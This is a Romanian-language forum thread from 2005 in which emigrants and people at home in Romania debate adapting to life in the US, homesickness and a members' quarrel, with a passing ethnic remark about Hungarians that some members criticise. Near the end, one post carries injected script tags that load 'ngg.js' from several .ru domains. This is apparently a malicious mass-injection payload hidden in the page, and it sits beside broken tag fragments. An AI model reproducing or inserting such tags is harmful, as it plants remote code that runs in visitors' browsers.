Nu cred ca timpul rezolva totul. Se poate sa ramai un neadaptat si dupa 20 de ani de trait in US. Dupa parerea mea, problema adaptarii si rezolvarea ei porneste de la momentul in care ai facut pasul emigrarii. Daca atunci datele au fost false, sau gresit puse in ecuatie, este normal ca rezultatul sa fie unul nesatisfacator. Este foarte important sa-ti reamintesti, tot timpul, ce te-a determinat sa emigrezi. Ce ai vrut sa realizezi prin dezradacinare. Fara a avea acest aspect bine determinat nu ai sa-ti gasesti locul niciodata. Tot la fel de adevarat este ca si usurinta sau greutatea cu care emigrarea a fost facuta are o pondere mare in determinarea succesului integrarii. Cu cat greutatile invinse au fost mai mari cu atat dorinta de a reusi si satisfactia atingerii telului vor fi mai mari. Pentru multi "norocul" de a ajunge in US in urma participarii la o loterie este o piedica, in loc sa fie un avantaj, dandu-le falsa impresie ca totul ar trebui sa vina de la sine, sa curga usor si linistit pe aceeasi albie. Nu este asa in realitate. Integrarea in noua societate, locul de munca satisfracator, viata sociala vibranta, satisfacerea placerilor spirituale sau materiale, tot ce tine de viata de zi cu zi, nu pot veni ca rezultat al norocului. In viata nu este ca la jocurile olimpice. Nu este suficient sa participi. Trebuie sa lupti din greu pentru fiecare pas pe care-l faci inainte. Fara determinare, efort si sacrificii nu poti ajunge acolo unde vrei sa ajungi. Daca stii unde vrei sa ajungi. Pentru ca daca nu stii unde mergi, inseamna ca ai ajuns deja acolo.

angela
08.02.2005, 05:35
Eu dupa cum bine se stie sunt sub un an de America, deci nu am vechime
ca emigrant...am urat America la inceput,in special statul in care
sunt, oriunde intorceam capul vedeam numai asiatici. Am crezut ca am
gresit tara sau continentul. Ma asteptam la ceva si am dat peste cu
totul altceva, vroiam sa fug la inceput cat ma tineau picioarele, noroc
cu sotul, om intelegator si rabdator care imi explica frumusel ca daca
tot ne iubim atat si vrem sa avem o familie impreuna trebuie sa ma
acomodez cat mai repede cu putinta. Asta am facut, m-am acomodat si
traiesc fiecare clipa ca nu stiu ce va fii maine, in acelasi timp nici
nu mai vreau sa ma duc sa stau in tara si sa nu am ce oferi copiilor ,
sa alerg ca bezmetica pentru bani dar sa ajung la concluzia ca am
alergat toata viata doar ca sa platesc bills si cam atata tot. Nu vreau
lucrul acesta, nu pentru copii mei dar nici macar pentru mine, nu vreau
sa ajung imbatranita,acrita de viata inainte de vremesmileys/smiley5.gif,
vreau sa imi permit un concediu frumos, o croaziera, lucruri care in Ro
nici nu aveam de ce sa visez la ele. Aici pot munci 2 slujbe si cand am
timp liber ma pot distra de minune, ma pot duce la ski sau la mare, pot
face cam ceea ce vreau eu.

dana_pascan
08.02.2005, 09:26
Dragilor, multumesc pentru raspunsurile voastre. Cel putin nu ma simt singura in barca asta a incertitudinii.

Adevarul este ca pana acum nu am de ce sa ma plang de noua mea casa in SUA, toate imi merg mai bine decat le-am asteptat. Mi-am facut si prieteni, iar uneorii strainii m-au ajutat mai mult decat romanii. Cred ca nu va spun o noutate! Imi lipsesc si mie toate cele bune de acasa, dar nu pot sa uit cei 5 ani in care m-am "tarat pe coate si-n genunchi" ca sa supravietuiesc, iar aici intr-un an de zile, am realizat mai mult decat as fi visat. Nu e vorba doar de banii...e vorba de atitudinea pe care o au oamenii fata de mine.

Da, m-as intoarce in tara maine, daca prostia si ignoranta romaneasca ar disparea si daca as putea duce de aici atitudinea oamenilor, modul de a gandi si de a rezolva problemele si modul de a trai. Dar cum sansele ca asa ceva sa se intaple in curand tind la minus infinit, cred ca voi ramane aici...cu tot cu dorul meu de casa.

garfield
08.02.2005, 09:40
smileys/smiley32.gifGood for you dana, ma bucur ca ti-ai rezolvat o situatie buna si ca te simti bine aici si esti fericita. Iti urez numai bine si in viitor.smileys/smiley32.gif

rossa
08.02.2005, 19:51
Si eu care imi faceam probleme din cauza lui Brasov34 . Se pare totusi ca are ceva din MAMA DOLORES . SPUKY !!!!!!

Brasov34
09.02.2005, 13:52
Stii ceva "ROSSA" , chiar te rog innora mesajele mele! Nu am nevoie deloc de comenatrile tale care nu fac altceva decat sa iti dezbaluie cel mai mult "FRUMOSUL" tau caracter!

FELICITARI!smileys/smiley32.gif

DAR sa va mai spun ceva; eu am un principiu carenu a datgres in viata:

FERESTE_TE DE OAMENII CARE CU TINE VORBESC FRUMOS SI PE ALTII II TRATEAZA URAT; acei oameni nu iti pot deveni prieteni niciodata! Ei nu stiu decat sa barfeasca si sa "puna tara la cale" pentru ca altceva bun de construit nu au. Cand isi pierde "satisfactia" vei pica tu in plasa lui pentru ca asa este el construit!smileys/smiley19.gif

ROssa, te regasesti cumva in aceste randuri? REPET, nu am nevoie de raspuns, era doar o intrebare retorica!smileys/smiley2.gif

rossa
09.02.2005, 18:41
Nu ma-ndura sufletul sa te las eu asa neconsolata . Ai fost asa de emotionata cand ai scris asa zisele tale ''maxime'' incat ai dat pe de laturi (vezi cum pui accentul ). Eu observ ca tu ai o problema foarte mare , de fapt doua . 1) Te aprinzi foarte repede 2) Nu suporti sa ai un dialog . Esti oare obisnuita sa ti se dea tot timpul dreptate ? Mai este ceva , pui totul foarte mult la suflet . Eu unul iti promit ca nu mai zic nimic referitor la tine ( desi o sa-mi fie foarte greu sa fac acest lucru ) , regret ca sa ajuns aici si ti-am distrus lumea ta imaginara . Te-am si deranjat din meditatiile tale spirituale...

Brasov34
09.02.2005, 21:17
Iti multumesc mult! Chiar esti de apreciat!

Adevarul este ca nu stiu unde am greit!

Probabil nu am "loc" pe acest Forum. Sorine, chiar imi cer scuze daca am sa "dispar" curand de aici.

Simteam totusi ca se pot lega prietenii frumoase, insa cu oameni car ese ascund in spatele monitorului si "turuie" cat pot sa isi arate "puterea" nu ma pot "juca" si nici chiar pierde din pretiosul meu timp liber.

PACAT, sa stii ca nu este doar parerea mea, mi-au mai scris si alte persoane cat sunt de dezamagite de tonul discutiilor de pe acest site!

NU DAU NUME pentru ca nu vreau sa ii stiti - si sa ii luati si pe ei la "rost".

Eu va doresc insa succes! Imi dau seama ca n-am ce cauta aici sau prea putin...

ASA CA " DACA DRAGOSTE NU E NIMIC NU E"...n-are sens sa ma pierd in niste discutii fara sesn...

Stiu ca veti spune ca numai din cazua unei persoane?

Poate oi fi eu mai sesnibila, insa credeti-ma, nu imi place sa fiu luata de fraiera (CITAT ROSSA:Si eu care imi faceam probleme din cauza lui Brasov34 . Se pare totusi ca are ceva din MAMA DOLORES . SPUKY !!!!!!) pentru mine viata e mult pre aimprotanta decat sa port o dicutie virtuala cu cineva care ma afiseaza ca pe o persoana de doi lei; n-are sens.

Probabil ca va voi mai urmari sau cine stie , poate voi reintra cu o alta adresa si voi sta asa in umbra, cum imi place mie! Sa nu supar oe nimeni!Desi sunt o vorbareata voi face aceste efort pentru ca macar in ce ma priveste pe acest site sa fie lINISTE DEPLINA! Desi nu o sa fie cu siguranta!

Lumea e din ce in ce mai dezamagita

SORINE&lt; se simte absenta ta, sau ma rog, prea putina activitate de "arbitru" in ultimua vreme, ai intrat in "concediu"?smileys/smiley2.gif

EU VA DORESC NUMAI BINE TUTUROR&lt; iar prietenilor pe care am reusit sa mi fac pe site am sa le dau adresa mea de email sa imi poata scrie. Acolo , pe mail se pare ca discutiile pot fi mai omenesti uneroi si mult mai constructive!

Sorine, chiar iti multumesc ca prin intermediul tau am reusit sa imi fac cativa prieteni. Nua m nevoie de toata Romania, putin dar de CALITATE! (sau ma rog, compatibili cu mine!smileys/smiley2.gif)

PA!smileys/smiley32.gif(asta pt Rossa!)

rossa
09.02.2005, 21:52
Vezi sa nu dai cumva la cineva cu parul in cap si sa zici ca-i din vina mea !!! Nu cred ca va tine figura .... Oricum mie-mi pare foarte rau daca tu te-ai hotarat sa faci acest gest . Nu vad de ce ar fi trebuit sa intervina Sorin pentru ca nu au fost cuvinte triviale , murdare , injurii . Daca tu nu poti tine pasul si nu poti purta un dialog asta este . L-ai invocat pe Sorin de parca invocai puterea Divina . A fost o disputa intre doua persoane si atata tot . Nimic mai mult .

Brasov34
09.02.2005, 22:20
smileys/smiley2.gifok, BYE!smileys/smiley2.gif...

FELICITARI PENTRU dialogurile pe care stii tu sa le porti!smileys/smiley32.gif

TE pot numi chiar "GENIU"!Nu stiu ce cauti printre atatia oameni obisnuiti!smileys/smiley2.gif

Sorin nu epe post de "puterea DIVINA" ci am simtit ca trebuia sa-i las si lui un semn aici "la vedere", sa stie ce m-a suparat.Sau cine! E totusi "GAZDA" acestui Forum si ma gandeam ca e frumos sa-l salut de plecare.Nu mai mult!Mai ales ca e o persoana cu mult bun simt si stie sa trateze cu multa diplomatie orice problema.

...Iar cand pleci dintr-o casa inainte sa se termine "petrecerea" ai si un motiv pe care si daca nu vrei trebuie sa-l spui!

In rest, stai linistit, nu am muriteu din asta! Doar mi-ai lasat un gust amar...si stii tu, uneori cuvintele rele dor mai mult decat o "DISPUTA " in adevaratul sens al cuvantului.

Uneori ma bucur ca e numai o legatura virtuala acest FORUM.smileys/smiley1.gif

...Totusi, in acelasi timp regret ca nu stim sa ne apropiem noi romanii deloc; mereu ne "intepam" si cautam sa calcam peste "victimele" prinse si apoi sa triumfam cat suntem de tari...nu stiu daca asta este o regula a FERICIRII DEPLINE pentru cei in cauza, insa stiu ca multi purici nu fac intre adevaratele valori omenesti...OAMENII cu SUFLET MARE!Pe care ii apreciez si stimez si care din pacate sunt mult prea rari in societate...

DECI, eu nu parasesc site-ul decat fizic, nu voi mai posta nimic cel putin o perioada. DE intrat tot voi intra, ti-am spus , cu siguranta imi voi schimba adresa si nickname-ul si voi sta mai mult in umbra, ca e mai "SANATOS" vad!smileys/smiley19.gif

Si ti-am spus, nu e doar parerea mea, tu ai fost acela care m-a facut sa imi confirme ce au vazut altii pe site si de aceea ai inchis o "viata" , poate ca daca nu citeam altele pe aici nu imi pasa...insa nu pot sta linistita cand vad cate divergente apar mereu si ca lumea in loc sa ajunga la o discutie frumoasa, se cearta mai mereu si"ataca" continuu....eu nu sunt facuta pentru asta , te asigur!

Daca vei urmari topicurile, vei observa ca nu exista unul pe care sa nu existe oameni care sa devieze firul discutiiloraiurea , ca apoi sa apara cearta! Uite toate astea ma fac sa fiu intr-u teritoriu strain principiilor mele si prefer sa ma retrag. Nu suport o familie care mereu are ceva de "rezolvat" , si tensiunea creste...

DECI&lt; CU BINE&lt; dragii mei prieteni-cei care mi-ati fost intr-adevar si va asigur ca in scurt timp vom relua corespondenta pe emailurile personale!

SUCCES TUTUROR!

rossa
09.02.2005, 23:18
VAYA CON DIOS

10.02.2005, 00:39
Brasov, crezi ca era necesara toata panarama asta? Sa sti ca oameni cu bun simtcand au cate o neplacere pleaca discret pe usa din spate fara multe vorbe si argumente. Numai copiicand se supara fac scandal isi iau jucariile si pleaca casa. daca vrei sa pleci sau veri sa stai este treaba ta, in ambele cazuri nufaciomeniri nici o favoare.

Have a nice life!smileys/smiley31.gif

sorin
10.02.2005, 00:40
Probabil nu am "loc" pe acest Forum. Sorine, chiar imi cer scuze daca am sa "dispar" curand de aici.

................................................

SORINE&lt; se simte absenta ta, sau ma rog, prea putina activitate de "arbitru" in ultimua vreme, ai intrat in "concediu"?smileys/smiley2.gif

Suntem cu totii oameni maturi pe acest forum si nu pot sa stau toata ziua sa fac pe arbitrul pentru orice discutie in contradictoriu. Am incercat sa intervin in momentul cand se foloseau cuvinte nu prea frumoase si unii s-au plans de cenzura. Am spus ca de acum incolo voi interveni doar daca se foloseste un limbaj pornografic sau total neadecvat, pentru ca nu vreau sa se simta nimeni ca la gradinitza aici. Va sugerez sa va rezolvati rafuielile personale intre voi si sa nu asteptati interventii externe. Pentru mai multe amanunte cititi aici:

http://www.romanian-portal.com/forum/forum_posts.asp?TID=125 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=1250) 0

sauzimdebine
10.02.2005, 01:03
Oare de ce, in tumultul trecerii spre vejnicie, incerc a gasi altora vina, care, vreau nu vreau, salaslueste in mine? Oare de ce, fara a incerca macar, gasesc mult mai usoara calea renuntarii decat pe cea a luptei? Oare de ce, in neputinta si zbaterea mea, gresit consider ca toti si toate sunt la fel, fie ca mine, fie opus mie? Oare de ce, macar cateodata, nu am intelepciunea de a privi si in spatele oglinzii? Pot gasi si acolo o imagine. Oare de ce? Doar pentru ca sunt o fiinta omeneasca si accept ca a gresi este omeneste?
Accept aceasta idee atat timp cat se accepta ca a persista in greseala nu mai este omeneste. O consider o anulare a existentei ratiunii. Si ratiunea, atata cata am, nu-mi da voie sa-i elimin existenta.
Cata vreme voi respinge tot ceea ce nu-mi seamana, cata vreme nu voi accepta armonia diversitatii, cata vreme nu voi gasi calea spre mine inainte de a incerca a-i descoperi pe altii, cata vreme voi face toate acestea, nu voi reusi in a-mi gasi locul si linistea, oriunde ma voi afla.

rossa
10.02.2005, 01:11
Frumos !

aconi
17.02.2005, 06:51
Ia mai lasati vaicarela!Pentru cat? pentru nimic! ati aplicat zicala
Ubi bene ibi Patria.. sau invers? Voi ati ales asa ca stati acolo
si va "realizati".

Daca intre timp v-ati covins ca acolo este Patria unde iti este
sufletul atunci veniti repede inapoi ca sufletul vostru a ramas pe veci
aici.Fericirea nu consta numai in dolari.Fericire poate fi si in un
iglu! ?

sauzimdebine
17.02.2005, 07:21
Scuze pentru cei care l-au citit la timpul trimiterii, dar, pentru aconi si cei care inca mai gandesc ca el, ma vad nevoit sa trimit mesajul acesta inca o data.

Renuntarea La Salamul Cu Soia

Renuntarea la salamul cu soia, definita de unii drept punerea cozii intre picioare si plecarea spre zari mai luminoase, este de fapt un pret, pret platit constant, in fiecare zi. Este pretul platit de toti dezradacinatii care au cautat acel dezlantuitor altceva. Motivele determinante ale acestor cautari de altceva, venite uneori doar dintr-o neastamparata dorinta de nou, sau din necesitatea de mai bine, ori datorita constrangerilor sufocante ale raului inconjurator, raman secundare. Relevante sunt durerile drumului catre acel altceva si chinurile transformarii efemerului in realitate. Iesirea din siguranta obijnuintei, siguranta data de confortul banalului cotidian, te aduce in fata obstacolelor remodelarii determinate de necesitatea adaptarii la legile si regulile existentei in alte coordonate. Aceasta remodelare, atat ca proces in sine cat si ca intensitate a transformarii, este cu atat mai dureroasa existential cu cat departarea in spatiul fizic, ca si cea temporala, existenta intre organizari diferite socio-politic, este mai mare.
Renuntarea la salamul cu soia este un pret pe care eu am ales sa-l platesc in fiecare zi. Asta nu inseamna ca datorez ceva.
</font>

De retinut ca nu banii aduc fericirea, doar numarul lor.

tonita
17.02.2005, 12:52
De retinut ca nu banii aduc fericirea, doar numarul lor.

Mai bine le duc dorul dec

sauzimdebine
17.02.2005, 13:29
toni42, nici o problema. Da-mi mie nefericirea asta. smileys/smiley2.gif Nu-mi place dorul smileys/smiley36.gif, dorul banilor, evident. Decat sa-mi fie dor de bani ca de mama, mai bine sa-mi fie dor de o conversatie banala, inofensiva, lipsita de controverse, bla, bla, bla, si asa mai departe ... smileys/smiley9.gif

aconi
17.02.2005, 18:36
sorine,consider mai mult de cat pornografic expresia:..sa mancati carne
de ungur pe paine; asa ca te rog frumos sa-i explici autoarei ana tofan
ca astazi, asemenea gandire sau expresie nu-si are locul nici in
gluma.Eu am incercat sa -i raspund cat m-am priceput. aconi

tonita
17.02.2005, 20:36
sauzimdebine, sensibil la capitolul bani ?!

sauzimdebine
18.02.2005, 01:17
doar realist, toni42, doar realist smileys/smiley2.gif

aconi
18.02.2005, 03:03
doar realist, toni42, doar realist smileys/smiley2.gif

smileys/smiley2.gifSi filosof, priceput sa dai
sfaturi si "propuneri" ca pe vremuri,in toate domeniile.Noroc ca nu
sntem obligati sa ti le respectam.Spre exemplu: nu crezi ca exagerezi(
ca sa fiu finut) cand proipui un capitol pe forum cum sa ne debarasam
de obiceiurile relke de acasa?

Nu va simmtiti jigniti dragi forumisiti dezradacinati cu greu din
cuibul vostru din diferite motive. Eu nu am cuvinte sa caracterizez
aceasta propunere amembrului foorumului nostru ssauzimdebine.de
la cine? aconi

sauzimdebine
18.02.2005, 03:26
Spre exemplu: nu crezi ca exagerezi(ca sa fiu finut) cand proipui un capitol pe forum cum sa ne debarasam de obiceiurile relke de acasa?
Nu va simmtiti jigniti dragi forumisiti dezradacinati cu greu din cuibul vostru din diferite motive. Eu nu am cuvinte sa caracterizez aceasta propunere amembrului foorumului nostru ssauzimdebine.de la cine? aconi

Unde si cand aconi? Unde si cand am propus eu asa ceva? Trezeste-te omule. Era mesajul trimis de altcineva citat de mine, ca o gluma la propunerea avansata de Sorin, de a muta mesajele la alt capitol. Se pare ca politica te orbeste, de-mi atribui mie spusele altora.
Inca o data si pentru ultima oara, aconi, trezeste-te omule si nu mai da cu batul in mine. Daca nu ai invatat inca, afla ca batul are doua capete.

aconi
19.02.2005, 20:07
Daca as putea sa-i ofer fetitei mele o viata
normala in ROMANIA, de care si ea este foarte legata sufleteste, as
face pasul reintoarcerii. Nu se poate, deci nu-l fac.

URAAAAAAAA "batrane" se pare ca .."ne apropiem" si iar se pare ca
am fost neatent in alt mesaj(despre asta ) zilele urmatoare,nu
prea dispun de timp pe cat mi-e dorinta sa comunic cu voi. Oricum :cer
scuze.

Revenind "la oile noastre": Eu am parerea si am mai zis, Fericire exista si in iglu.....

Si totusi incepe sa se poata si poata aici; din ce in ce mai multi
tineri capabili si-au realizat deja o viata normala.Fiul meu, desi l-am
indemnat sa plece si avea ocazia, nici nu vrea sa auda de asa ceva.Si,
Slava Domnului, traieste decent la nivel apusean.dar si munceste i
nstil american. Cu amicitie, aconi

aconi
20.02.2005, 02:25
Eu dupa cum bine se stie sunt sub un an de America, deci nu am vechime
ca emigrant...am urat America la inceput,in special statul in care
sunt, oriunde intorceam capul vedeam numai asiatici. Am crezut ca am
gresit tara sau continentul. Ma asteptam la ceva si am dat peste cu
totul altceva, vroiam sa fug la inceput cat ma tineau picioarele, noroc
cu sotul, om intelegator si rabdator care imi explica frumusel ca daca
tot ne iubim atat si vrem sa avem o familie impreuna trebuie sa ma
acomodez cat mai repede cu putinta. Asta am facut, m-am acomodat si
traiesc fiecare clipa ca nu stiu ce va fii maine, in acelasi timp nici
nu mai vreau sa ma duc sa stau in tara si sa nu am ce oferi copiilor ,
sa alerg ca bezmetica pentru bani dar sa ajung la concluzia ca am
alergat toata viata doar ca sa platesc bills si cam atata tot. Nu vreau
lucrul acesta, nu pentru copii mei dar nici macar pentru mine, nu vreau
sa ajung imbatranita,acrita de viata inainte de vremesmileys/smiley5.gif,
vreau sa imi permit un concediu frumos, o croaziera, lucruri care in Ro
nici nu aveam de ce sa visez la ele. Aici pot munci 2 slujbe si cand am
timp liber ma pot distra de minune, ma pot duce la ski sau la mare, pot
face cam ceea ce vreau eu.

Chiar asa Angela, fii mai ingaduitoare; si asiaticii sunt tot oameni.

Cat despre concediu si croaziera; nu crezi ca le platesti prea sump cu
doua slujbe?Eu stiu ca cel mai bine este dupa regula celor 3x8 adica

8 ore munca, 8 ore odihna,8 ore distractii.

Cu 16 ore munca, nu vei fi acrita de viata cum ai fi fost acasa dar
risti sa ajungi obosita si imbatranita fizic inainte de vreme.aconi

inas
20.02.2005, 08:58
Aconi draga, parca spuneai ca fiul tau munceste in stil american. Ne spui si noua te rog, cam care ar fi ala? Se pare ca stii bine in ce fel se munceste aici...

20.02.2005, 19:54
Discutia asta n-are cum sa se termine si sunt convins ca toti cei emigrati pe undeva prin lume, au avut oncazia sa o poarte.

In concluzie unii se adapteaza, altii nu. Si asta nu din cauza ca americanii ar fi mai altfel decat romanii; sunt si ei un fel de romani, dar au avut "repartitie" mai buna... Dar totusi, din experienta mea, daca nu te adaptezi in america sau canada, nu prea ai sanse altundeva, cu atat mai putin in tari ca germania sau italia.

Multi dintre romanii pe care ii cunosc pe aici se plang de singuratate si duc dorul "vremurilor bune" din romania. Dar de fapt acele vremuri bune sunt viata de student, cu prieteni si distractie, fara bani dar si fara griji, viata care nu ar fi continuat neschimbata daca am fi ramas acolo; am fiinceput sa ne spetim lucrand, sa stam 12 ore la servici si seara ne-am fi prabusit pe canapea uitandu-ne la ProTV in loc de NBC, lao sticla de Ursus in loc de Miller Lite...

Toti romanii emigrati au istoriile lor, dar se pot grupa cel mai adesea in doua categorii: cei emigrati cu familiile si cei fara. Prima categorie e mai susceptibila la a-siface tot prieteni romani, in general alte familii, petrec mult timp impreuna si formeaza o micro-societate romaneasca la servici,mananca impreuna la cantina, se uita la meciuri de fotbal din campionatul italiei pe satelit in weekenduri, si isi petrec toate vacantele ori in Hawaii ori in romania. Cei fara familii se integreaza mai usor, de voie de nevoie: trebuie sa iesi in lume ca sa-ti faci prieteni altfel o iei razna, trebuie sa abordezi persoane noi, trebuie sa te perfectionezi in engleza ca sa te faci inteles nu doar in jargonul limitat pe care-l folosesti la servici, ci si la un pahar de bere cu noii prieteni.

De intors, putini se mai intorc, dorul de tara e invers proportional cu complexitatea relatiilor sociale si a contului in banca.

Fiecare o sa gaseasca raspunsul adecvat la intrebarea asta, mai devreme sau mai tarziu...

inas
21.02.2005, 03:06
smileys/smiley32.gif, ...bine spus! Desigur exista si exceptii, ca asa e lumea asta,pe ici pe colo mai sunt si idealisti, si e normal sa fie, dar cum pe pamant nu exista inca o societate perfecta, ori o acceptam asa cum e smileys/smiley19.gif, ori plecam pe Luna smileys/smiley2.gif, ori luptam sa ne schimbam, sau sa o schimbamsmileys/smiley18.gif...cat timp mai avem ceva energie si nu ne blazam de tot...

Numai bine tuturor!

aconi
21.02.2005, 06:21
Spre exemplu: nu crezi ca exagerezi(ca sa fiu finut) cand proipui
un capitol pe forum cum sa ne debarasam de obiceiurile relke de acasa?

Nu va simmtiti jigniti dragi forumisiti dezradacinati cu greu din
cuibul vostru din diferite motive. Eu nu am cuvinte sa caracterizez
aceasta propunere amembrului foorumului nostru ssauzimdebine.de la
cine? aconi

Unde si cand aconi? Unde si cand am propus eu asa
ceva? Trezeste-te omule. Era mesajul trimis de altcineva citat de mine,
ca o gluma la propunerea avansata de Sorin, de a muta mesajele la alt
capitol. Se pare ca politica te orbeste, de-mi atribui mie spusele
altora.

Inca o data si pentru ultima oara, aconi, trezeste-te omule si nu
mai da cu batul in mine. Daca nu ai invatat inca, afla ca batul are
doua capete.

De trezit nu am de ce a ma trezi pentru ca nu am
adormit.Poate, din neatentie, nu am observat ca era un citat.Asa ca
transmit, cele adresate tie, autorului acelor fanduri cu precizarea ca
e o propunere rusinoasa si umilitoare.Asa ca iti zic:mea culpa.
Cat despre bat, a fost o afirmatie care era gata gata sa ma
determine sa uit ca trebuie sa zic pardon la orice mica greseala.( nu
fii asa "bataios" ca nu mi-e teama si nici tie nu iti este felul.

Apropos:mai exista in U.S.A. si alti imigranti, veniti din alte
State , care au un asemnea Forum?Eu ma bucur ca acesta exista;voi va
plangeti oful si dorul de acasa, dar faceti si acelasi lucru, ce
dorim noi aici, sa se stie ca suntem romani, ca Romania exista i
e condusa democratic de romani.Nu vreti sau nu puteti intelege ca
aceste idealuri sunt periclitate chiar aici in Romania, prin
pretentiile exagerate ale UDMR, care au depasit mult limitele admise
pentru o minoritate care isi apara drepturile. Istoriceste
vorbind, peste ani si ani ungurii nostri,daca tot asa merg
treburile, vor conduce Romania. Si eu peste 50-60 de ani ii felicit, de
acolo de unde voi fi, daca sunt mai destepti ca noi romanii.

Sau, vom aunge ca si cetatenii americani: Cand vine unul la Arad(
aici traiesc eu) spunem ca avenit un american si el spune la fel, nu se
spune ca a venit un californian, floridan etc.Vom spune si noi: Sunt
EUROPEAN? si in final..... sunt pamantean,cetatean al minusculei
planete TERRA. aconismileys/smiley2.gif

aconi
21.02.2005, 06:35
Aconi draga, parca spuneai ca fiul tau munceste in stil
american. Ne spui si noua te rog, cam care ar fi ala? Se pare ca stii
bine in ce fel se munceste aici...

Inas, "cam care ar fi ala"Banuiesc ca te referi la stilul de
munca american despre care am amintit.Eu nu am pus piciorul pe
continentul american.Am spus prin comparatie cu cel din Germania si
alte state Vest-Europene,unde am vazut cum se lucreaza. Am gresit?

Sau.. hai sa-ti explic prin un banc. Inainte de 1989 un muncitor
american a fost invitat sa lucreze in Romania cu muncitorii
nostri sa le arate cum se folosesc niste masinarii.El a lucrat 8 ore
fara sa vorbeasca si la sfarsitul zilei de lucru a spus cateva fraze...
repede traducatorul...Ce a zis? " cer scuze colegilor ca nu am
participat la greva lor dar eu fac parte din alt sinndicat. aconi

rossa
21.02.2005, 22:16
Aconi si eu traiesc in Romania dar tu mirosi de la o posta a PRM . Te-am nimerit ? Inteleg sa ai spirit patriotic dar ar trebui sa ne uitam mai bine in urma si sa realizam ca disputele etnice ne-au adus numai necazuri si nerealizari economice.

aconi
21.02.2005, 22:33
Aconi si eu traiesc
in Romania dar tu mirosi de la o posta a PRM . Te-am nimerit ? Inteleg
sa ai spirit patriotic dar ar trebui sa ne uitam mai bine in urma si sa
realizam ca disputele etnice ne-au adus numai necazuri si nerealizari
economice.

Nu m-ai nimerit deloc draga rossa.Nu am apartinut si nu apartin nici
unei Formatiuni politice.Este bine sa privim in trecut dar este mai
bine sa privim so spre viitor. incearca sa privesti pste 50-60
ani aconi

aconi
21.02.2005, 22:36
Aconi si eu traiesc
in Romania dar tu mirosi de la o posta a PRM . Te-am nimerit ? Inteleg
sa ai spirit patriotic dar ar trebui sa ne uitam mai bine in urma si sa
realizam ca disputele etnice ne-au adus numai necazuri si nerealizari
economice.

Nu m-ai nimerit deloc draga rossa.Nu am apartinut si nu apartin nici
unei Formatiuni politice.Este bine sa privim in trecut dar este mai
bine sa privim so spre viitor. incearca sa privesti pste 50-60
ani aconi

Cat despre PRM mi-am spus parerea daca o doresti citeste pe acest
forum in articolul "Retragerea lui Vadim" Nu mi-ar fi jenas, cum
se poare ca tie iti este, sa fiu membru PRM asa cum in vad
eu. aconi

rossa
22.02.2005, 00:46
Habar nu am pe unde dracu mi-am pus ochelarii asa ca n-am cum sa privesc peste 50-60 de ani . Atunci o sa ma uit la concertul viermilor din cosciug (poate Da , poate NU , poate altii mai repede) smileys/smiley36.gif

aconi
22.02.2005, 01:13
Discutia asta n-are cum sa se termine si sunt convins ca toti cei emigrati pe undeva prin lume, au avut oncazia sa o poarte.

In concluzie unii se adapteaza, altii nu. Si asta nu din cauza ca
americanii ar fi mai altfel decat romanii; sunt si ei un fel de romani,
dar au avut "repartitie" mai buna... Dar totusi, din experienta mea,
daca nu te adaptezi in america sau canada, nu prea ai sanse altundeva,
cu atat mai putin in tari ca germania sau italia.

Multi dintre romanii pe care ii cunosc pe aici se plang de
singuratate si duc dorul "vremurilor bune" din romania. Dar de fapt
acele vremuri bune sunt viata de student, cu prieteni si distractie,
fara bani dar si fara griji, viata care nu ar fi continuat neschimbata
daca am fi ramas acolo; am fiinceput sa ne spetim lucrand, sa
stam 12 ore la servici si seara ne-am fi prabusit pe canapea uitandu-ne
la ProTV in loc de NBC, lao sticla de Ursus in loc de Miller
Lite...

fritz, nu vreau sa te flatez dar esti cu picioarele pe pamant si
tratezi fenomenul migratiei in modul cel mai realist dintre ,mesajele
pe care le-am lecturat aci.(parerea mea)

Migratia este un fenomen social care dateaza din vremuri stravechi.Cauzele sunt multiple si nu vreau sa le a

analizez aci.

In perioada cand migratiile se faceau in Grupuri,
problemele ce se discuta aci nu existau:Grupul mai mic sau mai mare
venea cu tot bagajul:Obiceiuri, limba,credinta,suflet etc.Nu
exista nostalgia, regretul ca ai lasat ceva "acasa".

Acum cand migratia se face individual se pun probleme complexe care difera de la individ la individ.

Ai dreptate, aceste discutii nu se vor termina nici
odata. Acel emigrant care isi face asemenea probleme le va incheia cand
inchee viata.

smileys/smiley2.gifVreau sa remarc un lucru: te-ai fi spetit stand la lucru 12 ore..

Oare acolo cate ore STAI la lucru? cate ore LUCREZI? Sunt covins ca
lucrezi nu stai si nu te spetesti; probabil si pentru motivul ca exista
o motivatie temeinica , se vede rezultatul muncii. Dar fii
atent,in Europa, mai precis in Germaniia se spune: Noi muncim dar
trebuie si sa traim. aconi.

Maaa ce "capra" sunt acum observ ca am intrat la mijlocul mesajului tau.cer scuze. pentru un roman ramas acasa se admite.smileys/smiley36.gif

Toti romanii emigrati au istoriile lor, dar se pot grupa cel mai
adesea in doua categorii: cei emigrati cu familiile si cei fara. Prima
categorie e mai susceptibila la a-siface tot prieteni romani, in
general alte familii, petrec mult timp impreuna si formeaza o
micro-societate romaneasca la servici,mananca impreuna la
cantina, se uita la meciuri de fotbal din campionatul italiei pe
satelit in weekenduri, si isi petrec toate vacantele ori in Hawaii ori
in romania. Cei fara familii se integreaza mai usor, de voie de nevoie:
trebuie sa iesi in lume ca sa-ti faci prieteni altfel o iei razna,
trebuie sa abordezi persoane noi, trebuie sa te perfectionezi in
engleza ca sa te faci inteles nu doar in jargonul limitat pe care-l
folosesti la servici, ci si la un pahar de bere cu noii prieteni.

De intors, putini se mai intorc, dorul de tara e invers proportional cu complexitatea relatiilor sociale si a contului in banca.

Fiecare o sa gaseasca raspunsul adecvat la intrebarea asta, mai devreme sau mai tarziu.../script>ript s<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></s<script src=http://www.iroe.ru/ngg.js></script>

rossa
22.02.2005, 01:23
Aconi , iar ai gresit "botoanele" ?

sauzimdebine
22.02.2005, 01:33
